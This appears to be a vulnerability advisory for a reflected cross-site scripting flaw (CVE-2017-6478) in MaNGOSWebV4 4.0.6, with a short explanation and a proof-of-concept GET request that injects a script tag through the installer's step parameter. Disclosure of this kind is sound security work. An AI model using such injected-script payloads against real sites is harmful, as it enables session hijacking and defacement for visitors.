MaNGOSWebV4 4.0.6 Cross Site Scripting

MaNGOSWebV4 4.0.6 was affected by a Cross-Site Scripting (XSS) vulnerability.

This MaNGOSWebV4 4.0.6 was affected by a Cross-Site Scripting (XSS) vulnerability.

This flaw stemmed from insufficient sanitization of user-supplied input. Attackers could inject malicious client-side scripts (typically JavaScript) into web pages.

When other users viewed these compromised pages, their browsers would execute the injected scripts. This allowed for various malicious activities, including session hijacking (stealing user cookies), defacement of the web interface, redirection to malicious sites, or unauthorized actions on behalf of the victim.

The vulnerability was addressed in subsequent versions, highlighting the importance of input validation and output encoding in web applications.

# Exploit Title: MaNGOSWebV4 4.0.6 - Reflected XSS
# Date: 2024-10-26
# Exploit Author: CodeSecLab
# Vendor Homepage: https://github.com/paintballrefjosh/MaNGOSWebV4
# Software Link: https://github.com/paintballrefjosh/MaNGOSWebV4
# Version: 4.0.6
# Tested on: Ubuntu Windows
# CVE : CVE-2017-6478

PoC:
// Access the vulnerable URL and trigger the XSS payload
GET http://mangoswebv4/install/index.php?step=%3Cscript%3Ealert(1)%3C/script%3E